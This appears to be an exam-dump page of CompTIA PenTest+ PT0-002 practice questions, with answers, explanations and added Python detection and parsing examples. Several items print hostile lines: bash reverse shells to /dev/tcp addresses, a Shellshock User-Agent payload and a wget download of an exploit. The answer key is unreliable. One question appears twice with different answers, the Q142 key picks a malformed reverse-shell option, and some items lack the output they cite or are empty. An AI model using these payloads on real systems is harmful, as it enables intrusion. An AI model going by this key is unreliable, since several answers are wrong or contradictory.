[Jun 22, 2024] Free CompTIA PenTest+ PT0-002 Exam Question
PT0-002 dumps & CompTIA PenTest+ sure practice dumps
The CompTIA PT0-002 exam covers the domains of penetration testing: planning and scoping, information gathering and vulnerability identification, attacks and exploits, and reporting and communication. Candidates must have in-depth knowledge of the testing tools, techniques, and methodologies used to identify and exploit vulnerabilities in target systems, and the communication skills to explain the vulnerabilities found to stakeholders and to guide remediation and mitigation plans.
The CompTIA PenTest+ exam is intended for professionals with a minimum of three years of experience in an IT-related role with a focus on security. The CompTIA PenTest+ certification exam validates the skills required for effective penetration testing and can improve employability in the IT security job market. The PT0-002 exam covers topics such as planning and scoping, reconnaissance, vulnerability identification, exploiting vulnerabilities, post-exploitation techniques, and reporting and communication. Certified professionals can demonstrate to employers that they have the knowledge and skills required to protect systems and networks from cyber threats.
NEW QUESTION # 126
Which of the following describes how a penetration tester could prioritize findings in a report?
- A. Network infrastructure
- B. Cyberthreats
- C. Business mission and goals
- D. Cyberassets
Answer: C
Explanation:
Prioritizing findings in a penetration test report should align with the business mission and goals. Understanding the business context allows a penetration tester to assess the impact of vulnerabilities in relation to the organization's critical functions and assets. This approach ensures that recommendations are not only technically sound but also relevant and actionable within the business's strategic framework. The other options (cyberassets, network infrastructure, and cyberthreats) are important factors, but they should be considered in terms of how they affect the business's mission and goals.
NEW QUESTION # 127
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?
- A. Scheduling of follow-up actions and retesting
- B. Attestation of findings and delivery of the report
- C. Acceptance by the client and sign-off on the final report
- D. Review of the lessons learned during the engagement
Answer: B
NEW QUESTION # 128
A penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus, but they share a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be called by each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?
- A. Conditional
- B. Sub application
- C. Dictionary
- D. Library
Answer: D
Explanation:
The term that is used to describe the common log-in code example is library, which is a collection of reusable code or functions that can be imported or called by other programs or scripts. A library can help simplify or modularize the code development process by providing common or frequently used functionality that can be shared across different programs or scripts. In this case, the penetration tester develops a library of code to perform the log-in that can be imported or called by each of the exploits targeted to a specific version of the software package. The other options are not valid terms that describe the common log-in code example. Conditional is a programming construct that executes a block of code based on a logical condition or expression, such as if-else statements. Dictionary is a data structure that stores key-value pairs, where each key is associated with a value, such as a Python dictionary. Sub application is not a standard programming term, but it may refer to an application that runs within another application, such as a web application.
NEW QUESTION # 129
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)
- A. Cross-site scripting
- B. Ransomware attacks
- C. Injection flaws
- D. Race-condition attacks
- E. Buffer overflows
- F. Zero-day attacks
Answer: A,C
Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XML External Entities (XXE)
A05-Broken Access Control
A06-Security Misconfiguration
A07-Cross-Site Scripting (XSS)
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
NEW QUESTION # 130
In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?
- A. Perform a reverse DNS query and match to the service banner.
- B. Test for RFC-defined protocol conformance.
- C. Attempt to brute force authentication to the service.
- D. Check for an open relay configuration.
Answer: A
NEW QUESTION # 131
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Enforce enhanced password complexity requirements.
- B. Disable or upgrade SSH daemon.
- C. Disable HTTP/301 redirect configuration.
- D. Implement a better method for authentication.
- E. Create an out-of-band network for management.
- F. Eliminate network management and control interfaces.
Answer: D,E
Explanation:
The intercepted request carries credentials in an HTTP Basic Authorization header, which is only Base64-encoded, so anyone able to sniff the production network can recover them, and the management interfaces are reachable from that same network; the device is therefore exposed to sniffing, brute-forcing, and attacks against the SSH daemon. The best recommendations are to create an out-of-band network for management, that is, a separate network that is not reachable from the production network, and to implement a better method of authentication, such as SSH keys or certificates.
The other options are not as effective or relevant.
NEW QUESTION # 132
A penetration tester runs the following command:
dig @ns1.comptia.local axfr comptia.local
Which of the following types of information would be provided?
- A. The DHCP scopes and ranges used on the network
- B. The hostnames and IP addresses of internal systems
- C. The DNSSEC certificate and CA
- D. The OS and version of the DNS server
Answer: B
Explanation:
The command dig @ns1.comptia.local axfr comptia.local requests a DNS zone transfer (AXFR), which copies the entire DNS database or zone file from a primary DNS server to a secondary DNS server. A DNS zone file contains records that map domain names to IP addresses and other information, such as mail servers, name servers, or aliases. A zone transfer therefore provides useful information for enumeration, such as the hostnames and IP addresses of internal systems, which helps identify potential targets or vulnerabilities. It can be performed with tools such as dig, which queries DNS servers for information about domain names, including IP addresses, mail servers, name servers, and other records. The other options are not types of information that a zone transfer would provide. The DNSSEC certificate and CA are not part of the zone file but belong to DNSSEC, an extension of the DNS protocol that provides authentication and integrity for DNS data. The DHCP scopes and ranges used on the network are not part of the zone file but belong to DHCP, the protocol that assigns dynamic IP addresses and other configuration parameters to devices on a network. The OS and version of the DNS server are not part of the zone file; they are obtained by OS fingerprinting, which identifies the OS and version of a remote system by analyzing its responses to network probes.
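As an added example that is not part of the original question set, the following parser reads constructed dig AXFR output and extracts exactly what the answer describes, the hostnames and IP addresses in the zone, and checks whether the transfer actually completed; a defender can run the same check against their own name servers to confirm transfers are refused. All names and addresses below are made up.

```python
import re
from collections import defaultdict

# Constructed sample of what `dig @ns1.comptia.local axfr comptia.local` prints when
# the server permits zone transfers. Names and addresses are invented for this example.
SAMPLE_AXFR_OUTPUT = """\
; <<>> DiG 9.18.1 <<>> @ns1.comptia.local axfr comptia.local
comptia.local.          3600    IN      SOA     ns1.comptia.local. hostmaster.comptia.local. 2024062201 7200 3600 1209600 3600
comptia.local.          3600    IN      NS      ns1.comptia.local.
comptia.local.          3600    IN      MX      10 mail.comptia.local.
ns1.comptia.local.      3600    IN      A       10.50.100.2
mail.comptia.local.     3600    IN      A       10.50.100.25
intranet.comptia.local. 3600    IN      A       10.50.100.40
vpn.comptia.local.      3600    IN      A       10.50.100.41
www.comptia.local.      3600    IN      CNAME   intranet.comptia.local.
comptia.local.          3600    IN      SOA     ns1.comptia.local. hostmaster.comptia.local. 2024062201 7200 3600 1209600 3600
;; XFR size: 9 records (messages 1, bytes 312)
"""

RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")


def parse_zone_records(text):
    """Return (owner, type, rdata) tuples from dig AXFR output, skipping ';' comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            owner, _ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip("."), rtype, rdata.strip()))
    return records


def hosts_from_transfer(text):
    """Map each hostname to its IPv4 addresses: the enumeration value of a zone transfer."""
    hosts = defaultdict(list)
    for owner, rtype, rdata in parse_zone_records(text):
        if rtype == "A":
            hosts[owner].append(rdata)
    return dict(hosts)


def transfer_succeeded(text):
    """A complete AXFR is bracketed by two identical SOA records; anything else means the
    server refused (dig prints 'Transfer failed.') or the answer was truncated."""
    soa = [r for r in parse_zone_records(text) if r[1] == "SOA"]
    return len(soa) == 2 and soa[0] == soa[1]
```

If transfer_succeeded() is True for a server that is not one of your own secondaries, the zone is exposed; in BIND this is corrected with an allow-transfer list naming only the secondaries.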
NEW QUESTION # 133
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
- A. Attestation of findings and delivery of the report
- B. Scheduling of follow-up actions and retesting
- C. Acceptance by the client and sign-off on the final report
- D. Review of the lessons learned during the engagement
Answer: C
NEW QUESTION # 134
A penetration testing firm performs an assessment every six months for the same customer. While performing network scanning for the latest assessment, the penetration tester observes that several of the target hosts appear to be residential connections associated with a major television and ISP in the area. Which of the following is the most likely reason for the observation?
- A. The penetration tester misconfigured the network scanner.
- B. The IP ranges changed ownership.
- C. The network scanning tooling is not functioning properly.
- D. The network scanning activity is being blocked by a firewall.
Answer: B
Explanation:
When a penetration tester notices several target hosts appearing to be residential connections associated with a major television and ISP, it is likely that the IP ranges originally assigned to the target organization have changed ownership and are now allocated to the ISP for residential use. This can happen when regional internet registries reallocate IP address space. Misconfiguration of the scanner, malfunctioning scanning tools, or firewall blocking would not typically result in residential connections being discovered in place of the expected organizational targets.
NEW QUESTION # 135
A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted?
- A. Remote command injection
- B. SQL injection
- C. DLL injection
- D. HTML injection
Answer: B
Explanation:
WAITFOR can be used in a type of SQL injection attack known as time-delay SQL injection or blind SQL injection. This attack works on the basis that true-or-false queries can be answered by the amount of time a request takes to complete. For example, an attacker can inject a WAITFOR command with a delay argument into an input field of a web application that uses SQL Server as its database. If the injected condition is true, the web application pauses for the specified period before responding; if it is false, the web application responds immediately. By observing the response time, the attacker can infer information about the database structure and data.
Based on this, the answer is SQL injection, an attack that exploits a vulnerability in a web application to execute arbitrary SQL commands on the database server.
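An added detection example, not from the original page, for the log-analysis situation in the question: it URL-decodes constructed access-log lines and flags requests carrying a time-delay SQL primitive, covering the SQL Server WAITFOR DELAY of the question as well as the MySQL, PostgreSQL and Oracle equivalents, which the question itself does not mention; a bare occurrence of the word "waitfor" in ordinary search text is deliberately not flagged. The log lines and addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access log lines (Common Log Format); not from any real system.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Jun/2024:10:01:02 +0000] "GET /products?id=42 HTTP/1.1" 200 5120
203.0.113.7 - - [22/Jun/2024:10:01:09 +0000] "GET /products?id=42%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 5120
198.51.100.3 - - [22/Jun/2024:10:02:15 +0000] "GET /search?q=waitfor+the+bus HTTP/1.1" 200 900
203.0.113.7 - - [22/Jun/2024:10:02:40 +0000] "GET /products?id=42+AND+SLEEP(5) HTTP/1.1" 200 5120
192.0.2.9 - - [22/Jun/2024:10:03:01 +0000] "POST /login HTTP/1.1" 302 0
"""

# Time-based (blind) SQL injection primitives for the common database engines.
TIME_BASED_SQLI = re.compile(
    r"""
    \bWAITFOR\s+DELAY\b        |   # Microsoft SQL Server
    \bSLEEP\s*\(               |   # MySQL / MariaDB
    \bPG_SLEEP\s*\(            |   # PostgreSQL
    \bBENCHMARK\s*\(           |   # MySQL CPU-burn variant
    \bDBMS_LOCK\.SLEEP\b           # Oracle
    """,
    re.IGNORECASE | re.VERBOSE,
)

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_request_target(target):
    """Undo URL encoding ('+' as space) so payloads are inspected as the database would see them."""
    # Decode twice to catch double-encoded payloads such as %2527 for a single quote.
    return unquote_plus(unquote_plus(target))


def find_time_based_sqli(log_text):
    """Return (client_ip, timestamp, decoded_target) for each request with a time-delay SQL primitive."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, _method, target, _status = m.groups()
        decoded = decode_request_target(target)
        if TIME_BASED_SQLI.search(decoded):
            hits.append((ip, ts, decoded))
    return hits
```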
NEW QUESTION # 136
Which of the following tools would be the best to use to intercept an HTTP response at an API, change its content, and forward it back to the origin mobile device?
- A. Android SDK Tools
- B. Drozer
- C. MobSF
- D. Burp Suite
Answer: D
Explanation:
Burp Suite is a web application security testing tool that can intercept, modify, and forward HTTP requests and responses. It can be used to manipulate the data sent between an API and a mobile device, such as changing the content of the response before it reaches the device. Drozer is a framework for Android security assessment, but it does not intercept HTTP traffic. Android SDK Tools are a set of tools for developing Android applications, but they do not have the functionality to intercept and modify HTTP responses. MobSF is a mobile security framework that can perform static and dynamic analysis of Android and iOS applications, but it does not have the capability to intercept and change HTTP responses at an API level. Reference: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 8: Application Testing; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 8: Application Testing; Burp Suite Documentation.
NEW QUESTION # 137
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:
Which of the following is the penetration tester conducting?
- A. Brute force
- B. DoS attack
- C. Port scan
- D. Credential stuffing
Answer: A
Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.
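Because the output for this question is not reproduced above, here is an added example (not from the page) of the detection logic a defender would apply to such attempts: it parses constructed sshd log lines and separates the brute-force pattern the explanation describes (one account, many password guesses) from credential stuffing (many accounts, about one guess each). The log lines, addresses and thresholds are all assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt (syslog format); hosts, users and addresses are made up.
SAMPLE_AUTH_LOG = """\
Jun 22 10:00:01 web01 sshd[2101]: Failed password for root from 203.0.113.7 port 51001 ssh2
Jun 22 10:00:02 web01 sshd[2102]: Failed password for root from 203.0.113.7 port 51002 ssh2
Jun 22 10:00:03 web01 sshd[2103]: Failed password for root from 203.0.113.7 port 51003 ssh2
Jun 22 10:00:04 web01 sshd[2104]: Failed password for root from 203.0.113.7 port 51004 ssh2
Jun 22 10:00:20 web01 sshd[2110]: Failed password for alice from 198.51.100.3 port 40001 ssh2
Jun 22 10:00:21 web01 sshd[2111]: Failed password for bob from 198.51.100.3 port 40002 ssh2
Jun 22 10:00:22 web01 sshd[2112]: Failed password for carol from 198.51.100.3 port 40003 ssh2
Jun 22 10:00:23 web01 sshd[2113]: Failed password for dave from 198.51.100.3 port 40004 ssh2
Jun 22 10:05:00 web01 sshd[2120]: Failed password for alice from 192.0.2.9 port 33001 ssh2
"""
FAILED = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
                    r"(?:invalid user )?(\S+) from (\S+) port")

def parse_failures(log_text):
    """Return (timestamp, username, source_ip) for every failed sshd password attempt."""
    out = []
    for m in filter(None, map(FAILED.match, log_text.splitlines())):
        out.append((datetime.strptime(m.group(1), "%b %d %H:%M:%S"), m.group(2), m.group(3)))
    return out

def max_in_window(timestamps, window_seconds):
    """Largest number of sorted events that fall inside any window_seconds-long interval."""
    best = start = 0
    for end in range(len(timestamps)):
        while (timestamps[end] - timestamps[start]).total_seconds() > window_seconds:
            start += 1
        best = max(best, end - start + 1)
    return best

def classify_sources(log_text, threshold=4, window_seconds=60):
    """Label each source IP: 'brute force' = many guesses against one account (the page's
    scenario); 'credential stuffing' = about one guess per account across many accounts;
    'mixed' = repeated guesses across several accounts; 'normal' = below threshold."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(log_text):
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        peak = max_in_window([ts for ts, _ in attempts], window_seconds)
        users = {u for _, u in attempts}
        if peak < threshold:
            verdicts[ip] = "normal"
        elif len(users) == 1:
            verdicts[ip] = "brute force"
        else:
            verdicts[ip] = "credential stuffing" if len(attempts) <= 2 * len(users) else "mixed"
    return verdicts
```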
NEW QUESTION # 138
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise.
While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
- A. Disable NIC.
- B. List processes.
- C. Spawn a local shell.
- D. Change the MAC address
Answer: C
Explanation:
The script author was trying to spawn a local shell by using the os.system() function, which executes a command in a subshell. The command being executed is "/bin/bash", which is the path to the bash shell, a common shell program on Linux systems. The script author may have wanted to spawn a local shell to gain more control or access over the compromised system, or to execute other commands that are not possible in the original shell. The other options are not plausible explanations for what the script author was trying to do.
NEW QUESTION # 139
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?
- A. MD5
- B. PBKDF2
- C. SHA-1
- D. bcrypt
Answer: A
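An added example, not from the page, showing why unsalted MD5 is the answer here: a precomputed table (a plain digest-to-password lookup, standing in for a rainbow table, which compresses the same precomputation into hash chains but needs the same precondition of an unsalted, deterministic hash) recovers MD5-stored passwords instantly, while a salted, iterated PBKDF2 store defeats it. The user records and passwords are constructed, and PBKDF2 is used instead of bcrypt because it is in the standard library.

```python
import hashlib
import os

# Constructed demo records; the users and passwords are made up for this example.
USERS = {"alice": "summer2024", "bob": "summer2024", "carol": "Tr0ub4dor&3"}


def store_md5(password):
    """Unsalted, fast hash: the same password always gives the same digest, so one
    precomputed table serves every user in every database that stores passwords this way."""
    return hashlib.md5(password.encode()).hexdigest()


def store_pbkdf2(password, salt=None, iterations=600_000):
    """Salted, iterated hash: a random per-user salt makes precomputation useless and
    the iteration count makes every guess expensive. Format: salt_hex$digest_hex."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + digest.hex()


def verify_pbkdf2(password, stored, iterations=600_000):
    """Recompute with the stored salt and compare against the stored digest."""
    salt_hex, _digest_hex = stored.split("$")
    return store_pbkdf2(password, bytes.fromhex(salt_hex), iterations) == stored


def build_lookup_table(candidates):
    """Precompute digest -> plaintext once; this is the work a rainbow table amortises."""
    return {store_md5(c): c for c in candidates}


def crack_with_table(table, stored_hashes):
    """Recover every password whose unsalted digest appears in the precomputed table."""
    return {user: table[h] for user, h in stored_hashes.items() if h in table}
```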
NEW QUESTION # 141
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
- A. bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
- B. powershell -exec bypass -f \\10.10.51.50\9891
- C. nc 10.10.51.50 9891 < exploit
- D. wget 10.10.51.50:9891/exploit
Answer: D
NEW QUESTION # 142
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
- A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- B. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
- D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
Answer: A
NEW QUESTION # 143
A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.
INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1
Answer:
Explanation:
NEW QUESTION # 144
A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
- A. nmap -n 192.168.0.1-254
- B. nmap -N 192.168.0.0/24
- C. nmap -n 192.168.0.1/16
- D. nmap -n 192.168.0.1 192.168.0.1.254
Answer: A